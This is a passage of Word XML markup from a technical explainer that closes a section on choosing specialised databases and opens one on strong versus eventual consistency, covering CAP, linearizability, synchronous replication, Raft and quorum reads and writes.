      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  If none of the above: use PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6B997" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  If multiple apply: polyglot persistence (each database for its strength)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393ABB75" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The deepest cross-cutting insight: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>every specialized database makes the same fundamental trade-off — it optimizes the physical layout of data for one class of access pattern by making other access patterns more expensive or impossible.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> A time series database optimizes sequential time-range reads at the cost of random single-record access. Cassandra optimizes single-partition writes at the cost of cross-partition queries. Elasticsearch optimizes full-text search at the cost of ACID transactions. Neo4j optimizes relationship traversal at the cost of aggregate analytics. The engineering discipline is recognizing which access pattern is the primary constraint for your use case, choosing the database whose physical layout aligns with that pattern, and accepting — deliberately, explicitly, with eyes open — the limitations that come with that choice. The worst outcome in database selection is choosing a general-purpose database for a specialized problem and building workarounds that replicate the specialized database's capabilities at a fraction of the performance — or choosing a specialized database for the wrong reason and fighting its limitations on every query that doesn't fit its model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2AA8CB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strong vs Eventual Consistency in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A4A4B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Consistency Really Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6720CADA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>In distributed systems, consistency refers to the guarantee about what value a read operation returns after a write has occurred, when data is replicated across multiple nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70130275" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The core question:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452269C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FFBEB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Node A: Writes X = 5 at time T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9070FD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Node B: Reads X at time T + Δ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724B753F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="53DDDBD6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>What value does Node B see?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01477497" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - Strong consistency: ALWAYS sees 5 (guaranteed, regardless of which node you ask)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D508226" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - Eventual consistency: MIGHT see 5, might see the old value (but will EVENTUALLY see 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049DB59D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this problem exists at all:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314D03CB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>In a single-machine database, there is no consistency problem. One copy of the data, one view. But the moment you replicate data (for availability, performance, or fault tolerance), you create multiple copies — and those copies take TIME to synchronize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729743F8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301772A6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The speed of light is finite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E961B9B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Same-rack replication: ~0.01ms to sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FADBFDC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Cross-datacenter: ~1-2ms to sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A61764" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Cross-region: ~50-200ms to sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DC2134" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF2CBD8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>During that sync time: different nodes have DIFFERENT values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5982CBFF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The consistency model defines what guarantees the system provides during that window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D8EE20" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental tradeoff (CAP/PACELC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6233F819" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC1B2F1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>You cannot simultaneously have:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FABBEA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - Strong consistency (all nodes agree on the value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907DD4C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - High availability (every request gets a response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC1658E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - Partition tolerance (system works despite network failures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F61D439" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="47176E2A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Strong consistency → sacrifice availability during partitions (refuse to answer until synchronized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EA2AD4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Eventual consistency → sacrifice correctness during normal operation (answer with possibly stale data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7A0498" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="3A398213">
          <v:rect id="_x0000_i6037" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="360F258B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Strong Consistency (Linearizability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2015BE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEF0878" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linearizability</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> (the strongest form of consistency): The system behaves as if there is a single copy of the data, and all operations happen atomically at a single point in time. Every read returns the most recent write, regardless of which node you ask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024B38C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08AE12" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Formal guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370AA276" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Once a write W completes (acknowledged to the client),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E075A64" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ANY subsequent read (from ANY client, to ANY node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2379C7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MUST return W's value (or a later write).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B03C420" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="6A87CAC7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>"Subsequent" is defined by real-time ordering — wall-clock time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767B153F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What this feels like to the application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB13BC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57610B42" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Time →  ─────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F9B579" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client A:    write(X=5)──────ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B3BC45" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client B:                          read(X)─────→ returns 5 ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A90AF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Client C:                              read(X)──→ returns 5 ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D7FCF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="383D1A51" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>After the write is acknowledged:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B276168" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - No client, on any node, at any time, will ever see X's old value again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D08D4D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - It's as if the write happened instantaneously at one point in time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC9977D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 How Strong Consistency Is Achieved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC5926B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach 1: Single-node (trivial case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498EDE06" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E86D24" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>One database, one machine. All reads and writes go to the same place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AFB333" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Trivially linearizable — but no fault tolerance, no scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7AA36B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach 2: Synchronous replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDBE4F7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB87D6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Write to primary → wait for ALL replicas to acknowledge → then ACK to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C6E7BF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="06B55D69" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Primary: write(X=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD4282" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  → Replica 1: apply(X=5) → ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D6C5D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  → Replica 2: apply(X=5) → ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B2FE6E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  → Replica 3: apply(X=5) → ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7A936" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Primary: → ACK to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428361FF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="45534442" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>After ACK: ALL nodes have X=5. Any node can serve reads consistently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266E82E7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cost: write latency = max(all replica latencies) — slowest replica dominates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A0931C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach 3: Consensus protocols (Raft/Paxos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4338860B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B2AFC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Leader proposes write → followers acknowledge → when MAJORITY (quorum) agrees → committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D0155" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="6398D00D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Raft (simplified):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78726912" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Leader: "Append X=5 to log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5835DC63" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Followers 1,2: "Appended" (2/3 = majority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25549DC1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Leader: "Committed" → ACK to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A34BC25" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1422B8C7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Reads: only leader serves reads (guaranteed to have all committed writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13175BE6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  OR: read quorum (ask majority, take latest value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022D437A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach 4: Quorum reads + writes (Dynamo-style)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D824649" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF2362" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>N = 3 replicas, W = 2, R = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D2E50" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="65366004" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Write: send to all 3, wait for 2 ACKs → committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720E790E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Read: query all 3, wait for 2 responses → take the one with highest version/timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3046F4BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
